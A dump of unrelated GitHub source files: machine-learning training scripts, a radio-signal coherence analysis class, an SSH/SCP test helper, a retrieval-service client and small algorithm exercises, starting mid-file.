ImageDataGenerator(rescale=1./255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\r\n\r\n# this is the augmentation configuration we will use for testing:\r\n# only rescaling\r\nval_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\ntrain_generator = train_datagen.flow(train_imgs_scaled, train_labels, batch_size=batch_size)\r\nval_generator = val_datagen.flow(validation_imgs_scaled, validation_labels, batch_size=batch_size//2)\r\n\r\n\r\nfrom keras.models import Model\r\nimport keras\r\nfrom keras.applications.inception_v3 import InceptionV3\r\n\r\ninception = InceptionV3(weights='imagenet', include_top=False, \r\n input_shape=(224, 224, 3))\r\n\r\noutput = inception.layers[-1].output\r\noutput = keras.layers.Flatten()(output)\r\nincept_model = Model(inception.input, output)\r\n\r\nincept_model.trainable = False\r\nfor layer in incept_model.layers:\r\n layer.trainable = False\r\n \r\n# import pandas as pd\r\n# pd.set_option('max_colwidth', -1)\r\n# layers = [(layer, layer.name, layer.trainable) for layer in incept_model.layers]\r\n# display(pd.DataFrame(layers, columns=['Layer Type', 'Layer Name', 'Layer Trainable']))\r\n \r\ndef get_bottleneck_features(model, input_imgs):\r\n features = model.predict(input_imgs, verbose=0)\r\n return features\r\n \r\ntrain_features_vgg = get_bottleneck_features(incept_model, train_imgs_scaled)\r\nvalidation_features_vgg = get_bottleneck_features(incept_model, validation_imgs_scaled)\r\n\r\nprint('Train Bottleneck Features:', train_features_vgg.shape, \r\n '\\tValidation Bottleneck Features:', validation_features_vgg.shape)\r\n\r\n\r\n\r\nfrom keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, InputLayer\r\nfrom keras.models import Sequential\r\nfrom keras import optimizers\r\nfrom keras import backend as K\r\n\r\ninput_shape = incept_model.output_shape[1]\r\n\r\nmodel = Sequential()\r\nmodel.add(InputLayer(input_shape=(input_shape,)))\r\nmodel.add(Dense(524, activation='relu', input_dim=input_shape))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(64, activation=K.tanh))\r\nmodel.add(Dropout(0.1))\r\nmodel.add(Dense(32, activation='relu'))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(32, activation='relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(32, activation='relu'))\r\nmodel.add(Dropout(0.1))\r\nmodel.add(Dense(1, activation='sigmoid'))\r\nsgd = optimizers.RMSprop(lr=1e-5)\r\nmodel.compile(loss='binary_crossentropy',\r\n optimizer=sgd,\r\n metrics=['accuracy'])\r\n\r\nmodel.summary()\r\n\r\n\r\nhistory = model.fit(x=train_features_vgg, y=train_labels,\r\n validation_data=(validation_features_vgg, validation_labels),\r\n batch_size=batch_size, \r\n epochs=150,\r\n verbose=1)\r\n\r\nf, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))\r\nt = f.suptitle('Model Performance', fontsize=18)\r\nf.subplots_adjust(top=0.85, wspace=0.3)\r\n\r\nepoch_list = list(range(1,151))\r\nax1.plot(epoch_list, history.history['acc'], label='Train Accuracy')\r\nax1.plot(epoch_list, history.history['val_acc'], label='Validation Accuracy')\r\nax1.set_xticks(np.arange(0, 151, 10))\r\nax1.set_ylabel('Accuracy Value')\r\nax1.set_xlabel('Epoch')\r\nax1.set_title('Accuracy')\r\nl1 = ax1.legend(loc=\"best\")\r\n\r\nax2.plot(epoch_list, history.history['loss'], label='Train Loss')\r\nax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')\r\nax2.set_xticks(np.arange(0, 151, 10))\r\nax2.set_ylabel('Loss Value')\r\nax2.set_xlabel('Epoch')\r\nax2.set_title('Loss')\r\nl2 = ax2.legend(loc=\"best\")\r\n\r\nmodel.save('JBM_Classification.h5')\r\nf.savefig('JBM_Classification.png')\r\n\r\n","repo_name":"sagarbhure/JBMClassification2","sub_path":"playingwithmodel.py","file_name":"playingwithmodel.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30938309641","text":"\"\"\"\n%正弦幅相一致性指标分析函数\n%\n%by chen lu\n%2021.12.1\n\"\"\"\nimport numpy as np\nfrom scipy.fftpack import fft, ifft\n\n\nclass Custom:\n \"\"\"\n base\n \"\"\"\n\n @classmethod\n def get_coherence(cls, sig, para) -> dict:\n \"\"\"\n 处理正弦信号,获取幅相一致性指标并生成校正因子\n 输入:\n 信号sig为按行排布的二维数组\n para为字典,存储信号参数,字典中必须有:fs,fc\n para = {\n 'fs': 4e9, # 采样率\n 'fc': 1950e6, # 信号频率\n 'RefChannel': 0, # 参考通道,默认为通道0\n 'GenCaliFactorEn': 1, # 生成校正因子使能,默认不使能\n }\n 输出:uniformity为字典,peak_amp_uniform幅度一致性/dB、peak_phase_uniform相位一致性/°和delay_uniform延迟一致性/ps\n peak_amp原始幅度/dB、peak_phase原始相位/°\n cali_factor_complex归一化复校正因子,cali_factor_uint校正因子(uint),cali_factor_hex16进制校正因子\n\n \"\"\"\n nc = sig.shape[0] # 获取信号通道数\n nr = sig.shape[1]\n uniformity = dict()\n # 正弦信号整周期截取\n fs = para['fs']\n fc_orig = para['fc']\n fc = cls.if_sample_freq(fc_orig, fs)\n n_min = cls.non_leakage_min_number(abs(fc), fs)\n if n_min:\n if n_min <= nr:\n nr = int(nr - nr % n_min) # 当可以整周期截断防止频谱泄露时取最大的Nr值\n sig = sig[:, :nr] # 整周期截取\n spec = fft(sig, nr) # 做FFT\n n_spec = int(nr / 2)\n if fc < 0:\n amp = abs(spec[:, -n_spec:]) # 找负频谱\n else:\n amp = abs(spec[:, :n_spec]) # 找正频谱\n max_index = np.argmax(amp) % n_spec\n if max_index == 0:\n amp_expect_zero = np.vstack((np.empty((nc, 10)), amp[:, -n_spec+10:])) # 去除零频附近10个点\n max_index = np.argmax(amp_expect_zero) % n_spec\n if fc < 0:\n max_index = max_index + n_spec\n if (nr % 2) == 1:\n max_index = max_index+1\n peak_amp = cls.mag2db(spec[:, max_index]) # 各通道提取同一频率处的值\n peak_phase = np.angle(spec[:, max_index])\n uniformity['peak_amp'] = peak_amp\n uniformity['peak_phase'] = np.degrees(peak_phase)\n f = cls.freq(fs, nr)\n fmax = f[max_index]\n if para.get('RefChannel'):\n ref_channel = para['RefChannel']\n else:\n ref_channel = 0 # 默认不生成校正因子\n\n peak_amp_uniform = peak_amp-peak_amp[ref_channel] # 幅度一致性,以参考通道作为基准\n peak_phase_uniform = peak_phase-peak_phase[ref_channel]\n peak_phase_uniform = np.angle(np.exp(1j * peak_phase_uniform))\n delay_uniform = -peak_phase_uniform / (2 * np.pi * fc_orig / 1e12) # 延迟需要用原始频率计算,单位ps\n peak_phase_uniform = np.degrees(peak_phase_uniform) # 用角度表示相位一致性\n uniformity['peak_amp_uniform'] = peak_amp_uniform\n uniformity['peak_phase_uniform'] = peak_phase_uniform\n uniformity['delay_uniform'] = delay_uniform\n # uniform = np.vstack((peak_amp_uniform, peak_phase_uniform, delay_uniform, peak_amp, peak_phase)).T # 一致性指标\n\n # 生成校正因子\n if para.get('GenCaliFactorEn'):\n gen_cali_factor_en = para['GenCaliFactorEn']\n else:\n gen_cali_factor_en = 0 # 默认不生成校正因子\n if gen_cali_factor_en:\n peak_amp_uniform = peak_amp_uniform-max(peak_amp_uniform)\n cali_factor = 10**(peak_amp_uniform/20)*np.exp(1j*peak_phase_uniform/180*np.pi) # 各通道福相因子\n cali_factor = 1/cali_factor # 倒数为校正因子\n uniformity['cali_factor_complex'] = cali_factor/max(abs(cali_factor))\n cali_factor_uint, cali_factor = cls.float_complex_2qi(cali_factor)\n cali_factor_hex = [0] * nc\n for i in range(nc):\n cali_factor_hex[i] = hex(int(cali_factor_uint[i])) # 16进制校正因子\n uniformity['cali_factor_uint'] = cali_factor_uint\n # uniformity['cali_factor_hex'] = cali_factor_hex\n return uniformity\n\n @classmethod\n def get_chirp_coherence(cls, chirp, para):\n \"\"\"\n 处理正弦信号,获取延迟一致性\n 输入:\n 信号chirp为按行排布的二维数组\n para为字典,存储信号参数,字典中必须有:fs,fc\n para = {\n 'fs': 4e9, # 采样率/Hz\n 'fc': 0, # 信号中心频率/Hz\n 'Bw': 1.8e9 # 带宽/Hz\n 'Tp':10e-6 # 脉宽/s\n 'RefChannel': 0, # 参考通道,默认为通道0\n 'InterpNum': 1, # FFT插值倍数,默认为100\n }\n 输出:uniform:延迟一致性/ns\n \"\"\"\n fs = para['fs']\n fc = para['fc']\n bw = para['Bw']\n tp = para['Tp']\n nc = chirp.shape[0]\n nr = chirp.shape[1]\n # window_en = bool(para['WindowEn'])\n\n kr = bw / tp\n # 生成mf因子并进行匹配滤波\n t_mf = np.arange(int(fs * tp)) / fs\n mf = np.exp(1j * np.pi * kr * (t_mf - tp / 2) ** 2 + 1j * 2 * np.pi * fc * t_mf)\n mf = np.conjugate(fft(mf, nr)) # 原信号频谱取共轭是mf因子\n spec = fft(chirp, nr)\n chirp = mf * spec # 匹配滤波\n # 窗函数\n # if window_en:\n # n_bw = round(bw / fs * nr) # 根据频谱计算窗的长度\n # window_type = para['WindowType'] # 加窗的类型,如果不是hamming且加窗使能,那么默认加kaiser窗\n # if window_type == 'hamming':\n # window = windows.hamming(n_bw)\n # else:\n # window = windows.kaiser(n_bw, 2.5)\n # window = np.concatenate((np.zeros(int((nr - n_bw) / 2)), window, np.zeros(int((nr - n_bw) / 2))), axis=0)\n # chirp = chirp * ifftshift(window) # 加窗\n chirp = ifft(chirp, nr) # 转成时域信号\n\n # 插值\n if para.get('InterpNum'):\n m = int(para['InterpNum']) # 获取插值倍数\n else:\n m = 100 # 默认fft插值100点\n sig = cls.interpft(chirp, nr * m) # 进行m倍fft插值\n fs = fs * m # 插值信号后的采样率\n # print('时间精度:%fps' % (1 / fs * 1e12))\n nr = sig.shape[1] # 插值后信号的点数\n t = np.arange(nr) / fs\n sig_db = cls.mag2db(abs(sig))\n sig_db = sig_db - sig_db.max() # 脉压结果(统一归一化)\n # 统计延时\n max_index = sig_db.argmax(axis=1) # 找出sig_db每行最大值的位置\n delay = t[max_index]\n delay = delay * 1e9 # 原始延迟/ns\n if para.get('RefChannel'):\n ref_channel = para['RefChannel']\n else:\n ref_channel = 0 # 默认参考通道为0\n uniform = delay - delay[ref_channel]\n return {'delay_uniform': uniform}\n\n @classmethod\n def float_complex_2qi(cls, complex_data, n_bit=16):\n \"\"\" 对浮点复数进行定点处理,并转换为QI形式\"\"\"\n max_value = max(abs(complex_data))\n complex_data = complex_data / max_value\n complex_data = np.around(complex_data * (2 ** (n_bit - 1) - 1)) # 量化\n data_real = np.real(complex_data)\n data_imag = np.imag(complex_data)\n data_real = data_real + (data_real < 0) * 2 ** n_bit # 补码对应的无符号数\n data_imag = data_imag + (data_imag < 0) * 2 ** n_bit\n data_qi = data_imag * (2 ** n_bit) + data_real # 虚部在高位\n return data_qi, complex_data\n\n @classmethod\n def float_complex_2QI(cls, fc_orig, fs):\n \"\"\" 计算中频采样频率\"\"\"\n fc = fc_orig\n if fc_orig > fs / 2:\n fc = fc_orig % fs\n if fc > fs / 2:\n fc = fc - fs\n return fc\n\n @classmethod\n def non_leakage_min_number(cls, fc, fs):\n \"\"\" 计算没有频谱泄漏的最小点数\"\"\"\n n_min = []\n for k in range(10000):\n if fs / fc * (k + 1) == int(fs / fc * (k + 1)):\n n_min = fs / fc * (k + 1) # 保证没有泄露的最小采样点数\n break\n return n_min\n\n @classmethod\n def if_sample_freq(cls, fc_orig, fs):\n fc = fc_orig\n if fc_orig > fs / 2:\n fc = fc_orig % fs\n if fc > fs / 2:\n fc = fc - fs\n return fc\n\n @classmethod\n def freq(cls, fs, n):\n \"\"\" 模拟频率轴构造,该频率轴与做完fft的信号对应,第一点为零频\"\"\"\n f = np.arange(n)\n f = f / n * fs\n mod = n % 2\n if mod == 0:\n n = int(n / 2)\n f[-n:] = f[-n:] - fs\n else:\n n = int(-(n + 1) / 2)\n f[-n] = f[-n] - fs\n return f\n\n @classmethod\n def interpft(cls, x, ny):\n \"\"\"对按行排列的数组进行FFT插值 x: 原始信号 ny: 插值后的点数\"\"\"\n na = x.shape[0]\n nr = x.shape[1]\n a = fft(x, nr)\n nyqst = int(np.ceil((nr + 1) / 2))\n b = np.hstack((a[:, 0:nyqst], np.zeros((na, ny - nr)), a[:, nyqst:nr]))\n b[:, nyqst - 1] = b[:, nyqst - 1] / 2\n b[:, nyqst + ny - nr - 1] = b[:, nyqst - 1]\n y = ifft(b, ny)\n y = y * ny / nr\n return y\n\n @classmethod\n def mag2db(cls, y):\n \"\"\"同matlab的mag2db,为防止输入非正数调用失败,负数取模,0取0.000001,即-120dB\"\"\"\n y = abs(y)\n y[y == 0] = 0.000001\n ydb = 20 * np.log10(y)\n return ydb\n","repo_name":"sunningxiao/RFSdemo","sub_path":"ui/附加功能/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40359999790","text":"import subprocess\nimport time\nimport os\nimport select\n\nclass SSHControl(object):\n\n def __init__(self, host=None, timeout=300, logfile=None):\n self.host = host\n self.timeout = timeout\n self._starttime = None\n self._out = ''\n self._ret = 126\n self.logfile = logfile\n self.ssh_options = [\n '-o', 'UserKnownHostsFile=/dev/null',\n '-o', 'StrictHostKeyChecking=no',\n '-o', 'LogLevel=ERROR'\n ]\n self.ssh = ['ssh', '-l', 'root'] + self.ssh_options\n\n def log(self, msg):\n if self.logfile:\n with open(self.logfile, \"a\") as f:\n f.write(\"%s\\n\" % msg)\n\n def _internal_run(self, cmd):\n # We need this for a proper PATH\n cmd = \". /etc/profile; \" + cmd\n command = self.ssh + [self.host, cmd]\n self.log(\"[Running]$ %s\" % \" \".join(command))\n self._starttime = time.time()\n # ssh hangs without os.setsid\n proc = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, preexec_fn=os.setsid)\n return proc\n\n def run(self, cmd, timeout=None):\n \"\"\"Run cmd and get it's return code and output.\n Let it run for timeout seconds and then terminate/kill it,\n if time is 0 will let cmd run until it finishes.\n Time can be passed to here or can be set per class instance.\"\"\"\n\n if self.host:\n sshconn = self._internal_run(cmd)\n else:\n raise Exception(\"Remote IP/host hasn't been set, I can't run ssh without one.\")\n\n # run the command forever\n if timeout == 0:\n output = sshconn.communicate()[0]\n else:\n # use the default timeout\n if timeout is None:\n tdelta = self.timeout\n # use the specified timeout\n else:\n tdelta = timeout\n endtime = self._starttime + tdelta\n output = ''\n eof = False\n while time.time() < endtime and not eof:\n if select.select([sshconn.stdout], [], [], 5)[0] != []:\n data = os.read(sshconn.stdout.fileno(), 1024)\n if not data:\n sshconn.stdout.close()\n eof = True\n else:\n output += data\n endtime = time.time() + tdelta\n\n # process hasn't returned yet\n if sshconn.poll() is None:\n sshconn.terminate()\n time.sleep(3)\n try:\n sshconn.kill()\n except OSError:\n pass\n output += \"\\n[!!! SSH command killed - no output for %d seconds. Total running time: %d seconds.\" % (tdelta, time.time() - self._starttime)\n\n self._ret = sshconn.poll()\n # strip the last LF so we can test the output\n self._out = output.rstrip()\n self.log(\"%s\" % self._out)\n self.log(\"[SSH command returned after %d seconds]: %s\" % (time.time() - self._starttime, self._ret))\n return (self._ret, self._out)\n\n def _internal_scp(self, cmd):\n cmd = ['scp'] + self.ssh_options + cmd\n self.log(\"[Running SCP]$ %s\" % \" \".join(cmd))\n self._starttime = time.time()\n scpconn = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, preexec_fn=os.setsid)\n out = scpconn.communicate()[0]\n ret = scpconn.poll()\n self.log(\"%s\" % out)\n self.log(\"[SCP command returned after %d seconds]: %s\" % (time.time() - self._starttime, ret))\n if ret != 0:\n # we raise an exception so that tests fail in setUp and setUpClass without a need for an assert\n raise Exception(\"Error running %s, output: %s\" % ( \" \".join(cmd), out))\n return (ret, out)\n\n def copy_to(self, localpath, remotepath):\n actualcmd = [localpath, 'root@%s:%s' % (self.host, remotepath)]\n return self._internal_scp(actualcmd)\n\n def copy_from(self, remotepath, localpath):\n actualcmd = ['root@%s:%s' % (self.host, remotepath), localpath]\n return self._internal_scp(actualcmd)\n\n def get_status(self):\n return self._ret\n\n def get_output(self):\n return self._out\n","repo_name":"gyanranjan/securebox","sub_path":"meta/lib/oeqa/utils/sshcontrol.py","file_name":"sshcontrol.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"12220832340","text":"#!/usr/bin/env python\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom spectogram import spectogram\nimport numpy as np\nimport globals\nfrom dataloader import loadWav, writeWav, one_hot_decode\nfrom data import LazyDataset\nfrom os import walk\nfrom random import randrange\n\nlearning_rate = 1e-4\nCUDA = True\n\nclass Model(nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.iteration = 1\n\n def train(self, data, training=True, filename=''):\n global iteration\n\n # Get Input and target from data\n if torch.cuda.is_available() and CUDA:\n inputVector = data[0].cuda()\n target = data[1].cuda()\n else:\n inputVector = data[0] \n target = data[1]\n\n # Encapsulate in PyTorch Variable\n x = Variable(inputVector)\n y = Variable(target, requires_grad=False).squeeze()\n\n # Run input through model and compute loss\n y_pred = self(x).squeeze()\n loss = self.loss_fn(y_pred, y)\n\n if self.iteration % 100 == 0 and True:\n print(self.iteration if training else '', filename, loss.data[0])\n if self.iteration % 200 == 0 and True:\n print('\\ttarget = %s prediction = %s' % (y.shape, y_pred.shape))\n print('\\ttarget = %s prediction = %s\\n' % (y.data[0], y_pred.data[0]))\n\n # If training then backwards propagate, otherwise save prediction for output\n if training:\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.iteration += 1\n\n return y_pred.data\n\n def fileOutput(self, inputFile, outputFile, testFile=None):\n backup = self.iteration\n self.iteration = 1\n CurrentData = LazyDataset(loadWav(inputFile), \n procData=loadWav(testFile) if testFile != None else None) # test file used to calculate loss if that's important to you (optional)\n output = []\n for i, b in enumerate(CurrentData.sequentialSampler()):\n pred = self.train(b, training=False, filename=inputFile).squeeze().tolist()\n output += pred\n writeWav(np.array(output), outputFile)\n spectogram(outputFile)\n self.iteration = backup\n\nclass LSTMModel(Model):\n def __init__(self):\n super(LSTMModel, self).__init__()\n # Model Architecture\n self.lstm1 = nn.LSTM(globals.INPUT_VECTOR_SIZE, 800, 8)\n self.fc = nn.Sequential(\n nn.Linear(800,1))\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=learning_rate)\n self.loss_fn = torch.nn.MSELoss(size_average=False)\n\n if torch.cuda.is_available() and CUDA:\n self = self.cuda()\n\n def forward(self, x):\n x = self.lstm1(x)\n x = x[0]\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\nclass ConvModel(Model):\n def __init__(self):\n super(ConvModel, self).__init__()\n # Model Architecture\n ivs = globals.INPUT_VECTOR_SIZE\n ovs = 2**16\n self.conv = nn.Sequential(\n nn.Conv1d(64, 800, 1), nn.ReLU(),\n nn.Conv1d(800, 800, 1), nn.ReLU(),\n nn.Conv1d(800, 700, 1), nn.ReLU(),\n nn.Conv1d(700, 500, 1), nn.ReLU(),\n nn.Conv1d(500, 250, 1), nn.ReLU(),\n nn.Conv1d(250, 100, 1), nn.ReLU(),\n nn.MaxPool1d(1))\n self.fc = nn.Sequential(\n nn.Linear(100, 50), nn.ReLU(),\n nn.Linear(50, 25), nn.ReLU(),\n nn.Linear(25, 10), nn.ReLU(),\n nn.Linear(10, 1))\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=learning_rate)\n self.loss_fn = torch.nn.MSELoss(size_average=False)\n\n if torch.cuda.is_available() and CUDA:\n self = self.cuda()\n\n def forward(self, x):\n x = self.conv(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\nclass LinearModel(Model):\n def __init__(self):\n super(LinearModel, self).__init__()\n # Model Architecture\n self.lin1 = nn.Sequential(nn.Linear(1, 64), nn.ReLU(),\n nn.Linear(64, 32), nn.ReLU(),\n nn.Linear(32, 16), nn.ReLU(),\n nn.Linear(16, 1))\n\n self.optimizer = torch.optim.Adam(self.parameters(), lr=learning_rate)\n self.loss_fn = torch.nn.MSELoss(size_average=False)\n\n if torch.cuda.is_available() and CUDA:\n self = self.cuda()\n\n def forward(self, x):\n x = self.lin1(x)\n return x\n\ndef main():\n def loadData():\n getFiles = lambda x : ([ '%s/%s' % (x, l) \n for l in list(walk(x))[0][2] if l.endswith('.wav')])\n\n dryFiles = getFiles('./dataset')\n wetFiles = getFiles('./dataset/processed')\n\n dryData = []\n wetData = []\n\n # Iterate over files and processed files\n for file, pFile in zip(dryFiles, wetFiles):\n dryData = dryData + list(loadWav(file))\n wetData = wetData + list(loadWav(pFile))\n return LazyDataset(np.array(dryData), np.array(wetData))\n def doCheckPoint(model, name):\n model.fileOutput('./model_outputs/test.wav', \"./model_outputs/%d output.wav\" % name, testFile='model_outputs/processed/test.wav')\n torch.save(model.state_dict(), './model_checkpoints/%d.model' % name)\n\n model = ConvModel()\n CurrentData = loadData()\n for i, data in enumerate(CurrentData.randomSampler()):\n model.train(data)\n if model.iteration % globals.OUTPUT_FREQUENCY == 0:\n doCheckPoint(model, model.iteration)\n doCheckPoint(model, -1)\nmain()\n","repo_name":"KieranMcCool/MusicalEffectModelling-L4Project","sub_path":"Experiments/NeuralNetwork/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":5687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"23464583115","text":"def minsubarraysum(target, nums):\n\tleft = 0 \n\tresult = float('inf')\n\tvalsum = 0\n\n\tfor i in range(len(nums)):\n\t\tvalsum += nums[i]\n\t\twhile valsum >= target:\n\t\t\tresult = min(result, i+1-left)\n\t\t\tvalsum -= nums[left]\n\t\t\tleft+=1\n\n\tif result == float('inf'):\n\t\treturn 0\n\treturn result\n\n\t\n\nminsubarraysum(7,[2,3,1,2,4,3])","repo_name":"vishnubharadwaj00/AlgorithmsAndDataStructures","sub_path":"Leetcode/minsubarrsum.py","file_name":"minsubarrsum.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36854079751","text":"import argparse\nimport os\nimport random\nimport string\nimport webbrowser\nfrom time import sleep\n\nimport requests\n\nbase_api = f\"http://localhost:8088\"\n\n\ndef request_text(text_query):\n text_api = f\"{base_api}/display_text\"\n\n headers = {\n \"accept\": \"application/json\",\n \"content-type\": \"application/x-www-form-urlencoded\",\n }\n\n params = {\"text_query\": text_query}\n\n requests.post(text_api, params=params, headers=headers)\n\n\ndef request_image(image_file):\n image_api = f\"{base_api}/display_image\"\n image = open(image_file, \"rb\")\n files = {\"image_file\": image}\n\n response = requests.post(image_api, files=files)\n\n\nif __name__ == \"__main__\":\n # not in cache\n\n generated_strings = []\n length = 20\n images_file = os.listdir(\"/tmp/GLAMI-1M/GLAMI-1M-dataset/images/\")\n num_strings_query = 1000\n\n while len(generated_strings) < num_strings_query:\n characters = string.ascii_lowercase + string.digits\n random_string = \"\".join(random.sample(characters, length))\n if random_string not in generated_strings:\n generated_strings.append(random_string)\n\n for i in range(len(images_file)):\n request_image(\n os.path.join(\"/tmp/GLAMI-1M/GLAMI-1M-dataset/images/\", images_file[i])\n )\n request_text(generated_strings[i])\n sleep(1)\n\n # in cache\n # images_file = os.listdir(\"/tmp/GLAMI-1M/GLAMI-1M-dataset/images/\")\n # for i in range(len(images_file)):\n # request_image(\n # os.path.join(\"/tmp/GLAMI-1M/GLAMI-1M-dataset/images/\", images_file[1])\n # )\n # sleep(1)\n","repo_name":"duongngyn0510/text-image-retrieval","sub_path":"observable_systems/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"11722230164","text":"from numpy import sqrt, logspace, log10, zeros, linspace, pi, interp, exp, log\nfrom Model import J_lambda_prep, Ent_Volume, Ent_Volume_Z, max_entrainement, Ent_rate_prev, get_rise_speed\nfrom Utilities import findcLceta, ulambda_sq\nimport matplotlib.pyplot as plt\nfrom matplotlib.legend_handler import HandlerLine2D, HandlerTuple\nfrom scipy.io import loadmat\nfrom matplotlib.ticker import ScalarFormatter\nfrom scipy.integrate import quad\nfrom numba import jit #, float64\nimport matplotlib.pyplot as plt\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\nplt.rcParams[\"mathtext.fontset\"] = \"stix\"\nfs=12\n\n##########################\n# PHYSICAL PARAMETERS #\n##########################\nkt=1.23; et=1.83; nu=1e-6; g=9.81; rhoc=1000; sig=0.072\ncL,cEta=findcLceta(kt,et,nu,mode=1)\nnlst=2000\nlst=logspace(-8,3,nlst);\tul2_lst=zeros(nlst) #with dimension!\nfor i in range(nlst):\n\tul2_lst[i]=ulambda_sq(lst[i],kt,et,cL,cEta,nu,pope_spec=1.01)\n# Load the depth table:\nTable=loadmat(\"UoIEntrainment.mat\"); color_lst=['black','red','blue']\n############################################################################\n#========================= Rising speed =========================#\n############################################################################\nnz=200; nl=3\nl_lst=[1e-2,1e-1,1]; wz_lst=zeros((nz,nl,4))\nl1=1e-8; l2=logspace(-7,3,100)\n@jit(nopython=True, cache=True)\ndef ulam_nlam(logl,kt,et,nu,cL,cEta,lst,ul2_lst,output):\n\tl=exp(logl)\n\tulamsq=interp(l,lst,ul2_lst)\n\tC=1.5;\tp0=2.0; be=5.2; k=2*pi/l\n\tL=kt**1.5/et; eta=(nu**3/et)**0.25\n\tfl = (k*L/((k*L)**2+cL)**0.5)**(5.0/3.0+p0)\n\tfeta= exp(-be*(((k*eta)**4+cEta**4)**0.25-cEta))\n\tEk = C*et**(2.0/3.0)*k**(-5.0/3.0)*fl*feta\n\tn_lam=24*Ek/(l**5*ulamsq)\n\tif output == 1: #numerator\n\t\treturn sqrt(ulamsq)*n_lam * l\n\telif output == 2: #denominator\n\t\treturn n_lam * l\nnumerator=zeros(100); denominator=zeros(100)\nfig=plt.figure(figsize=(6,3),dpi=300); ax1=fig.add_subplot(121); ax2=fig.add_subplot(122)\nfor i in range(100):\n\n\tnumerator[i] = quad(ulam_nlam, log(l1), log(l2[i]), args=(kt,et,nu,cL,cEta,lst,ul2_lst,1),\\\n\t limit = 200, epsrel=1e-6, epsabs=1.0e-10)[0]\n\tdenominator[i] = quad(ulam_nlam, log(l1), log(l2[i]), args=(kt,et,nu,cL,cEta,lst,ul2_lst,2),\\\n\t limit = 200, epsrel=1e-6, epsabs=1.0e-10)[0]\n\nax1.plot(l2,numerator,\tlabel='numerator')\nax2.plot(l2,denominator, label='denominator')\nax1.legend(); ax2.legend()\nax1.set_xscale('log'); ax1.set_yscale('log')\nax2.set_xscale('log'); ax2.set_yscale('log')\n# l2=5.1\n# ldebug=logspace(log10(l1),log10(l2),200); deno=zeros(200)\n# for i in range(200):\n# \tl=ldebug[i]\n# \tdeno[i]=ulam_nlam(l,kt,et,nu,cL,cEta,lst,ul2_lst,output=2)\n# \n# ax=fig.add_subplot(111)\n# ax.plot(ldebug,deno); ax.set_xscale('log'); ax.set_yscale('log')\n# denominator,abserr,infodict = quad(ulam_nlam, l1, l2, full_output=1,\\\n# args=(kt,et,nu,cL,cEta,lst,ul2_lst,2),\\\n# limit = 100, epsrel=1e-6, epsabs=1.0e-10)\n# # ax.plot(infodict['alist'],infodict['blist'],linestyle='none',marker='0')","repo_name":"yb8119/MITEntrainment","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39578051760","text":"\n\nfrom mydb.db import Database\n#\ndb = Database()\ndb.connect()\nplants = ['A001', 'A002', 'A003', 'A004', 'A005', 'A006', 'A007', 'A008', 'A009', 'A011']\n\nfor plant in plants:\n db.create_tables(plant)\ndb.close_conn()","repo_name":"Elvitz88/udbot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13411106233","text":"from collections import deque\n\ncomputer = int(input())\nnetwork = int(input())\n\ngraph = [[] * computer for _ in range(computer + 1)]\nvisited = [False] * (computer + 1)\nq = deque()\n\nfor i in range(network):\n first, second = map(int, input().split())\n graph[first].append(second)\n graph[second].append(first)\n\n\ndef bfs(start):\n ans = 0\n q.append(start)\n visited[start] = True\n\n while q:\n f_node = q.popleft()\n\n for s_node in graph[f_node]:\n if not visited[s_node]:\n q.append(s_node)\n visited[s_node] = True\n ans += 1\n return ans\n\n\nprint(bfs(1))\n","repo_name":"SeungAh-Hong/algorithm-study-hyundai","sub_path":"Baekjoon/DFS_BFS/바이러스_장서윤.py","file_name":"바이러스_장서윤.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"15550156660","text":"'''\nTime complexity = O(N)\nSpace complexity = O(2^h-1)\n'''\n#BFS iterative solution\nfrom collections import deque\n\n#Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def invertTree(self, root: TreeNode) -> TreeNode:\n if not root:\n return root\n \n queue = deque()\n queue.append(root)\n \n while queue:\n node = queue.popleft()\n node.left, node.right = node.right, node.left\n if node.left:\n queue.append(node.left)\n 